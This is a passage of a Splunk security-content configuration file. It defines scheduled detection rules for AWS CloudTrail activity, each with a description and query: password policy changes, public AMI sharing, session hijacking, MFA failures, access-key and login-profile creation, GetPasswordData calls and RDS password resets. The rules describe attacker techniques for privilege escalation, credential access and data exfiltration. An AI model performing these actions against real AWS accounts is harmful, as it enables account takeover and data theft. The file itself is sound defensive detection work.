action.escu.eli5 = This search looks for AWS CloudTrail events from Amazon Security Lake where a user is making successful API calls to view/update/delete the existing password policy in an AWS organization. It is unlikely for a regular user to conduct this operation. These events may potentially be malicious; adversaries often use this information to gain more understanding of the password defenses in place and exploit them to increase their attack surface when a user account is compromised.
action.escu.how_to_implement = You must install Splunk Add-On for AWS Version v7.0.0 (https://splunkbase.splunk.com/app/1876), which includes a merge of all the capabilities of the Splunk Add-on for Amazon Security Lake. This search works with Amazon Security Lake logs which are parsed in the Open Cybersecurity Schema Framework (OCSF) format.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately triggered an AWS audit tool activity which may trigger this event.
action.escu.creation_date = 2023-05-22
action.escu.modification_date = 2023-05-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - ASL AWS Password Policy Changes - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Security Lake"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation", "Compromised User Account"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - ASL AWS Password Policy Changes - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `amazon_security_lake` "api.service.name"="iam.amazonaws.com" "api.operation" IN ("UpdateAccountPasswordPolicy","GetAccountPasswordPolicy","DeleteAccountPasswordPolicy") "api.response.error"=null | stats count min(_time) as firstTime max(_time) as lastTime by identity.user.account_uid identity.user.credential_uid identity.user.name identity.user.type identity.user.uid identity.user.uuid http_request.user_agent src_endpoint.ip cloud.region | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `asl_aws_password_policy_changes_filter`

[ESCU - AWS AMI Attribute Modification for Exfiltration - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for suspicious AWS AMI attribute modifications, such as sharing it with another AWS account or making the full AMI image public. Adversaries are known to abuse these APIs to exfiltrate sensitive organization information stored in AWS resources; it is therefore very important to monitor this seemingly benign API activity in CloudTrail logs.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for suspicious AWS AMI attribute modifications, such as sharing it with another AWS account or making the full AMI image public. Adversaries are known to abuse these APIs to exfiltrate sensitive organization information stored in AWS resources; it is therefore very important to monitor this seemingly benign API activity in CloudTrail logs.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = It is possible that an AWS admin has legitimately shared a snapshot with others for a specific purpose.
action.escu.creation_date = 2023-03-31
action.escu.modification_date = 2023-03-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS AMI Attribute Modification for Exfiltration - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Suspicious Cloud Instance Activities", "Data Exfiltration"]
action.risk = 1
action.risk.param._risk_message = AWS AMI from account $aws_account_id$ is shared externally with $accounts_added$ from $src_ip$, or the AMI is made public.
action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 80}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS AMI Attribute Modification for Exfiltration - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for suspicious AWS AMI attribute modifications, such as sharing it with another AWS account or making the full AMI image public. Adversaries are known to abuse these APIs to exfiltrate sensitive organization information stored in AWS resources; it is therefore very important to monitor this seemingly benign API activity in CloudTrail logs.
action.notable.param.rule_title = AWS AMI Attribute Modification for Exfiltration
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=ModifyImageAttribute (requestParameters.launchPermission.add.items{}.userId = * OR requestParameters.launchPermission.add.items{}.group = all) | rename requestParameters.launchPermission.add.items{}.group as group_added | rename requestParameters.launchPermission.add.items{}.userId as accounts_added | eval ami_status=if(match(group_added,"all"),"Public AMI","Not Public") | stats count min(_time) as firstTime max(_time) as lastTime values(group_added) values(accounts_added) as accounts_added values(ami_status) by src_ip region eventName userAgent user_arn aws_account_id userIdentity.principalId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ami_attribute_modification_for_exfiltration_filter`

[ESCU - AWS Concurrent Sessions From Different Ips - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an AWS IAM account with concurrent sessions coming from more than one unique IP address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victim's browser and is using them from a different location to access corporate online resources. When a user navigates the AWS Console after authentication, the API call with the event name `DescribeEventAggregates` is registered in the AWS CloudTrail logs. The Splunk Threat Research team leveraged this event name to identify 2 concurrent sessions. The presence of this event occurring from two different IP addresses is highly unlikely. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an AWS IAM account with concurrent sessions coming from more than one unique IP address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victim's browser and is using them from a different location to access corporate online resources. When a user navigates the AWS Console after authentication, the API call with the event name `DescribeEventAggregates` is registered in the AWS CloudTrail logs. The Splunk Threat Research team leveraged this event name to identify 2 concurrent sessions. The presence of this event occurring from two different IP addresses is highly unlikely. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = A user with concurrent sessions from different IPs may also represent the legitimate use of more than one device. Filter as needed and/or customize the threshold to fit your environment.
action.escu.creation_date = 2023-02-01
action.escu.modification_date = 2023-02-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Concurrent Sessions From Different Ips - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["Compromised User Account", "AWS Identity and Access Management Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user_arn$ has concurrent sessions from more than one unique IP address $src_ip$ in the span of 5 minutes.
action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 42}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Concurrent Sessions From Different Ips - Rule
action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies an AWS IAM account with concurrent sessions coming from more than one unique IP address within the span of 5 minutes. This behavior could represent a session hijacking attack whereby an adversary has extracted cookies from a victim's browser and is using them from a different location to access corporate online resources. When a user navigates the AWS Console after authentication, the API call with the event name `DescribeEventAggregates` is registered in the AWS CloudTrail logs. The Splunk Threat Research team leveraged this event name to identify 2 concurrent sessions. The presence of this event occurring from two different IP addresses is highly unlikely. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.notable.param.rule_title = AWS Concurrent Sessions From Different Ips
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName = DescribeEventAggregates src_ip!="AWS Internal" | bin span=5m _time | stats values(userAgent) values(eventName) values(src_ip) as src_ip dc(src_ip) as distinct_ip_count by _time user_arn | where distinct_ip_count > 1 | `aws_concurrent_sessions_from_different_ips_filter`

[ESCU - AWS Console Login Failed During MFA Challenge - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an authentication attempt event against an AWS Console that fails during the Multi Factor Authentication challenge. AWS CloudTrail logs provide a very useful field called `additionalEventData` that logs information regarding usage of MFA. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1621"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an authentication attempt event against an AWS Console that fails during the Multi Factor Authentication challenge. AWS CloudTrail logs provide a very useful field called `additionalEventData` that logs information regarding usage of MFA. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled.
action.escu.how_to_implement = The Splunk AWS Add-on is required to utilize this data. The search requires AWS CloudTrail logs.
action.escu.known_false_positives = Legitimate users may fail to respond to the MFA challenge within the time window or deny it by mistake.
action.escu.creation_date = 2022-10-03
action.escu.modification_date = 2022-10-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Console Login Failed During MFA Challenge - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover", "Compromised User Account"]
action.risk = 1
action.risk.param._risk_message = User $user_name$ failed to pass MFA challenge while logging into console from $src$
action.risk.param._risk = [{"risk_object_field": "user_name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Console Login Failed During MFA Challenge - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1621"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies an authentication attempt event against an AWS Console that fails during the Multi Factor Authentication challenge. AWS CloudTrail logs provide a very useful field called `additionalEventData` that logs information regarding usage of MFA. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled.
action.notable.param.rule_title = AWS Console Login Failed During MFA Challenge
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=ConsoleLogin errorMessage="Failed authentication" additionalEventData.MFAUsed="Yes" | stats count min(_time) as firstTime max(_time) as lastTime by src eventName eventSource aws_account_id errorCode errorMessage userAgent eventID awsRegion user_name userIdentity.arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_console_login_failed_during_mfa_challenge_filter`

[ESCU - AWS Create Policy Version to allow all resources - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events where a user created a policy version that allows them to access any resource in their account.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where a user created a policy version that allows them to access any resource in their account.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created a policy to allow a user to access all resources. That said, AWS strongly advises against granting full control to all AWS resources and you must verify this activity.
action.escu.creation_date = 2022-05-17
action.escu.modification_date = 2022-05-17
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Create Policy Version to allow all resources - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation"]
action.risk = 1
action.risk.param._risk_message = User $user$ created a policy version that allows them to access any resource in their account.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Create Policy Version to allow all resources - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user created a policy version that allows them to access any resource in their account.
action.notable.param.rule_title = AWS Create Policy Version to allow all resources
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=CreatePolicyVersion eventSource=iam.amazonaws.com errorCode=success | spath input=requestParameters.policyDocument output=key_policy_statements path=Statement{} | mvexpand key_policy_statements | spath input=key_policy_statements output=key_policy_action_1 path=Action | where key_policy_action_1 = "*" | stats count min(_time) as firstTime max(_time) as lastTime values(key_policy_statements) as policy_added by eventName eventSource aws_account_id errorCode userAgent eventID awsRegion user user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_create_policy_version_to_allow_all_resources_filter`

[ESCU - AWS CreateAccessKey - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection rule monitors for the creation of AWS Identity and Access Management (IAM) access keys. An IAM access key consists of an access key ID and secret access key, which are used to sign programmatic requests to AWS services. While IAM access keys can be legitimately used by developers and administrators for API access, their creation can also be indicative of malicious activity. Attackers who have gained unauthorized access to an AWS environment might create access keys as a means to establish persistence or to exfiltrate data through the APIs. Moreover, because access keys can be used to authenticate with AWS services without the need for further interaction, they can be particularly appealing for bad actors looking to operate under the radar. Consequently, it's important to vigilantly monitor and scrutinize access key creation events, especially if they are associated with unusual activity or are created by users who don't typically perform these actions. This hunting query identifies when a potentially compromised user creates an IAM access key for another user who may have higher privileges, which can be a sign of privilege escalation. Hunting queries are designed to be executed manually during threat hunting.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This detection rule monitors for the creation of AWS Identity and Access Management (IAM) access keys. An IAM access key consists of an access key ID and secret access key, which are used to sign programmatic requests to AWS services. While IAM access keys can be legitimately used by developers and administrators for API access, their creation can also be indicative of malicious activity. Attackers who have gained unauthorized access to an AWS environment might create access keys as a means to establish persistence or to exfiltrate data through the APIs. Moreover, because access keys can be used to authenticate with AWS services without the need for further interaction, they can be particularly appealing for bad actors looking to operate under the radar. Consequently, it's important to vigilantly monitor and scrutinize access key creation events, especially if they are associated with unusual activity or are created by users who don't typically perform these actions. This hunting query identifies when a potentially compromised user creates an IAM access key for another user who may have higher privileges, which can be a sign of privilege escalation. Hunting queries are designed to be executed manually during threat hunting.
action.escu.how_to_implement = You must install the Splunk AWS add-on and Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created keys for another user.
action.escu.creation_date = 2022-03-03
action.escu.modification_date = 2022-03-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS CreateAccessKey - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS CreateAccessKey - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 13"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName = CreateAccessKey userAgent !=console.amazonaws.com errorCode = success | eval match=if(match(userIdentity.userName,requestParameters.userName),1,0) | search match=0 | stats count min(_time) as firstTime max(_time) as lastTime by requestParameters.userName src eventName eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.principalId user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`aws_createaccesskey_filter`

[ESCU - AWS CreateLoginProfile - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for AWS CloudTrail events where a user A (victim A) creates a login profile for user B, followed by an AWS Console login event from user B from the same src_ip as user B. This correlated event can be indicative of privilege escalation since both events happened from the same src_ip.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for AWS CloudTrail events where a user A (victim A) creates a login profile for user B, followed by an AWS Console login event from user B from the same src_ip as user B. This correlated event can be indicative of privilege escalation since both events happened from the same src_ip.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and the Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created a login profile for another user.
action.escu.creation_date = 2021-07-19
action.escu.modification_date = 2021-07-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS CreateLoginProfile - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation"]
action.risk = 1
action.risk.param._risk_message = User $user_arn$ is attempting to create a login profile for $requestParameters.userName$ and did a console login from this IP $src_ip$
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS CreateLoginProfile - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 13"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user A (victim A) creates a login profile for user B, followed by an AWS Console login event from user B from the same src_ip as user B. This correlated event can be indicative of privilege escalation since both events happened from the same src_ip.
action.notable.param.rule_title = AWS CreateLoginProfile
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName = CreateLoginProfile | rename requestParameters.userName as new_login_profile | table src_ip eventName new_login_profile userIdentity.userName | join new_login_profile src_ip [| search `cloudtrail` eventName = ConsoleLogin | rename userIdentity.userName as new_login_profile | stats count values(eventName) min(_time) as firstTime max(_time) as lastTime by eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.principalId user_arn new_login_profile src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`] | `aws_createloginprofile_filter`

[ESCU - AWS Credential Access Failed Login - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search shows that there has been an unsuccessful attempt to log in to the AWS management console using the user identity. Since the user identity has access to AWS account services and resources, an attacker might try to brute force the password for that identity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = This search shows that there has been an unsuccessful attempt to log in to the AWS management console using the user identity. Since the user identity has access to AWS account services and resources, an attacker might try to brute force the password for that identity.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and the Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = Users may genuinely mistype or forget the password.
action.escu.creation_date = 2022-08-07
action.escu.modification_date = 2022-08-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Credential Access Failed Login - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user$ has a login failure from IP $src$
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Credential Access Failed Login - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search shows that there has been an unsuccessful attempt to log in to the AWS management console using the user identity. Since the user identity has access to AWS account services and resources, an attacker might try to brute force the password for that identity.
action.notable.param.rule_title = AWS Credential Access Failed Login
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats count earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Authentication where Authentication.action = failure Authentication.app=AwsConsoleSignIn Authentication.signature=ConsoleLogin BY Authentication.app Authentication.signature Authentication.dest Authentication.user Authentication.action Authentication.user_id Authentication.src | `drop_dm_object_name(Authentication)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_credential_access_failed_login_filter`

[ESCU - AWS Credential Access GetPasswordData - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection analytic identifies more than 10 GetPasswordData API calls made to your AWS account within a time window of 5 minutes. Attackers can retrieve the encrypted administrator password for a running Windows instance.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.001"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This detection analytic identifies more than 10 GetPasswordData API calls made to your AWS account within a time window of 5 minutes. Attackers can retrieve the encrypted administrator password for a running Windows instance.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and the Splunk App for AWS. This search works with AWS CloudTrail logs. We encourage users to adjust the value of `distinct_instance_ids` and tweak the `span` value according to their environment.
action.escu.known_false_positives = Administrator tooling or automated scripts may make these calls, but it is highly unlikely that they make several calls in a short period of time.
action.escu.creation_date = 2022-08-10
action.escu.modification_date = 2022-08-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Credential Access GetPasswordData - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"]
action.risk = 1
action.risk.param._risk_message = User $user_arn$ is seen to make multiple `GetPasswordData` API calls to instance ids $instance_ids$ from IP $src_ip$
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Credential Access GetPasswordData - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName=GetPasswordData eventSource = ec2.amazonaws.com | bin _time span=5m | stats count values(errorCode) as errorCode dc(requestParameters.instanceId) as distinct_instance_ids values(requestParameters.instanceId) as instance_ids by aws_account_id src_ip user_arn userAgent eventName _time | where distinct_instance_ids > 10 | `aws_credential_access_getpassworddata_filter`

[ESCU - AWS Credential Access RDS Password reset - Rule]
action.escu = 0
action.escu.enabled = 1
description = The master user password for an Amazon RDS DB instance can be reset using the Amazon RDS console. Using this technique, an attacker can get access to the sensitive data in the DB. Production databases often hold sensitive data such as credit card information, PII, and health care data. This event should be investigated further.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The master user password for an Amazon RDS DB instance can be reset using the Amazon RDS console. Using this technique, an attacker can get access to the sensitive data in the DB. Production databases often hold sensitive data such as credit card information, PII, and health care data. This event should be investigated further.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and the Splunk App for AWS. This search works with AWS CloudTrail logs.
action.escu.known_false_positives = Users may genuinely reset the RDS password.
action.escu.creation_date = 2024-03-19
action.escu.modification_date = 2024-03-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Credential Access RDS Password reset - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"]
action.risk = 1
action.risk.param._risk_message = $database_id$ password has been reset from IP $src$
action.risk.param._risk = [{"risk_object_field": "database_id", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "src", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Credential Access RDS Password reset - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The master user password for an Amazon RDS DB instance can be reset using the Amazon RDS console. Using this technique, an attacker can get access to the sensitive data in the DB. Production databases often hold sensitive data such as credit card information, PII, and health care data. This event should be investigated further.
action.notable.param.rule_title = AWS Credential Access RDS Password reset
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
